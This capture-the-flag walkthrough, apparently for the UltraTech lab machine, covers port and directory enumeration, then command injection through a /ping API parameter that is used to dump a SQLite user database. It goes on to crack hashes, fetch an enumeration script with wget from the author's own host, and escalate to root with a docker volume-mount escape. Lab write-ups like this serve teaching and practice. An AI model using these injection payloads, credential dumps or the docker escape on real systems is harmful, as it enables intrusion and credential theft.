[Task 1] Deploy the machine

[Task 2] It’s enumeration time!

  1. Which software is using the port 8081?
nmap -Pn <ip>
nmap -Pn -p1000- <ip>

In total, there’re 4 ports: 21,22,8081, and 31331.

Os and services scan

nmap -p 21,22,8081,31331 -A <ip>

Vulnerable scan

nmap -p 21,22,8081,31331 --script vuln <ip>

2. Which other non-standard port is used?
ANS: It’s in #1.

3. Which software using this port?
ANS: It’s in #1.

4. Which GNU/Linux distribution seems to be used?
ANS: It’s in #1.

5. The software using the port 8080 is a REST api, how many of its routes are used by the web application?

Access port 8081. Seems like It’s a web API.

View page source, not much useful.

Let’s scan

gobuster  dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://<ip>:8081/ -x php,txt,html,sh,cgi

There’s another path appeared.

Access it. Seems like I need some parameter.

I guess that “login” and “password” is a parameter. From the result, my guessing is correct.

Let’s access HTTP site on port 31331.

Seems like these’re possible usernames: r00t, P4c0, and Sq4l.

View page source, not much useful.

Click “What are we doing?”. Nothing much.

I always log my finding of the site with Burp Suite. There’s a possible of username: ultratech.

gobuster  dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://<ip>:31331/ -x php,txt,html,sh,cgi

Access /images

Access partners.html

Try input some data and intercept with Burp Suite

Seems like this site is calling API on port 8081.

Access /css

Access /js

Access /api/api.js, there’s custom function: /ping and /auth.

Access robots.txt, there’s utech_sitemap.txt

Access it, nothing new.

Looking in Burp Suite’s sitemap again. There’s another api link besides /auth: /ping

[Task 3] Let the fun begin

  1. There is a database lying around, what is its filename?

Send /ping request to Burp Suite’s repeater.

Let’s try to do command injection

Using “;”



Using “;” and “${IFS}”



Using “||” and encode as URL


Using “ ` ”. It is precedence over other characters.

Success!!! There’s utech.db.sqlite

2. What is the first user’s password hash?

I try to get it from port 8081, but I failed.

Let’s read it via api.

Encode command “…||`cat utech.db.sqlite`” first

Paste the encoded string and send the request

Success!!! There’re 2 users: r00t and admin

3. What is the password associated with this hash?

Crack the hash with crackstation.

[Task 4] The root of all evil

Access API with credentials, there’s new user: “lp1”.

Access ftp with r00t:n100906

ls -la

Nothing much

Access ftp with admin:mrsheafy


Try access ssh with r00t’s credential

Let’s do the enum first

Prepare to upload lse.sh

python -m SimpleHTTPServer 80

Download it.

wget http://<ip>/lse.sh

Change permission

chmod 777 lse.sh
./lse.sh -i -l 1

There’re 4 users with shell

Another user that have sudo rights.

Not much useful

This machine has docker.

Verify sudo again

sudo -l

Read cron

cat /etc/crontab

Not much useful.

Let’s try to get shell from docker

docker run -v /:/mnt --rm -it bash chroot /mnt sh

Now I’m root.

cd /rootcat private.txt
cd .sshcat id_rsa
cat id_rsa | cur -c1-9